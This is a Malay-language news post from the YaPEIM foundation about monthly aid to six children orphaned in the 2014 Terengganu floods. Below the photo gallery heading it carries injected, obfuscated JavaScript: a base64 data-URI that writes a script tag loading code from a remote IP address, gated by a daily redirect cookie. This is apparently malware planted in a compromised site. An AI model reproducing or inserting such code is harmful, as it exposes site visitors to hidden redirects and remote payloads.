YaPEIM » Korban Banjir : YaPEIM Sumbang RM1,200 Sebulan Kepada Keluarga

Terkini

Korban Banjir : YaPEIM Sumbang RM1,200 Sebulan Kepada Keluarga

Ketua Pengarah YaPEIM telah mengadakan lawatan ke rumah bapa saudara yang menjaga anak-anak tersebut pada 12 Disember 2015 di Kemaman, Terengganu.

PADA penghujung Disember 2014 banjir besar melanda beberapa buah negeri di Malaysia. Pada 24 Disember 2014 musibah banjir yang berlaku telah meragut pasangan suami isteri iaitu arwah Suhaimi Awang serta pasangannya Nurhayati Sulong. Kejadian itu berlaku semasa Nurhayati Sulong yang merupakan seorang guru pulang ke rumah untuk meletakkan kertas peperiksaan SPM yang belum selesai ke tempat yang lebih selamat, semasa perjalanan pulang ke pusat pemindahan bot yang dinaiki pasangan tersebut telah terperangkap di dalam pusaran air lalu bot tersebut terbalik sehingga menyebabkan pasangan tersebut terkorban. Pasangan tersebut telah meninggalkan 6 orang cahaya mata yang berusia 4 bulan sehingga 12 tahun.

Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) telah tampil untuk membantu anak-anak pasangan tersebut melalui Skim Sinar Kasih. YaPEIM melalui Ketua Pengarahnya iaitu Dato’ Abibullah Bin Haji Samsudin telah mengadakan lawatan ke rumah bapa saudara yang bertanggungjawab menjaga anak-anak tersebut pada 12 Disember 2015. Hasil daripada lawatan tersebut YaPEIM telah menyatakan komitmen untuk memberi bantuan sebanyak RM200.00 kepada semua anak-anak pasangan yang terkorban tersebut pada setiap bulan bagi tempoh setahun, bantuan akan dilanjutkan lagi setelah penilaian dibuat oleh pegawai YaPEIM. Dalam pertemuan tersebut Ketua Pengarah YaPEIM telah menyampaikan sumbangan dan memberi kata-kata semangat kepada keluarga tersebut.

Bapa saudara kepada anak-anak tersebut telah menyampaikan ucapan terima kasih dan terharunya di atas perhatian dan bantuan yang di beri oleh Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) dalam membantu anak-anak pasangan arwah Nurhayati Sulong dan Suhaimi Awang tersebut menjalani kehidupan selepas menjadi anak yatim piatu.

Galeri Gambar

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top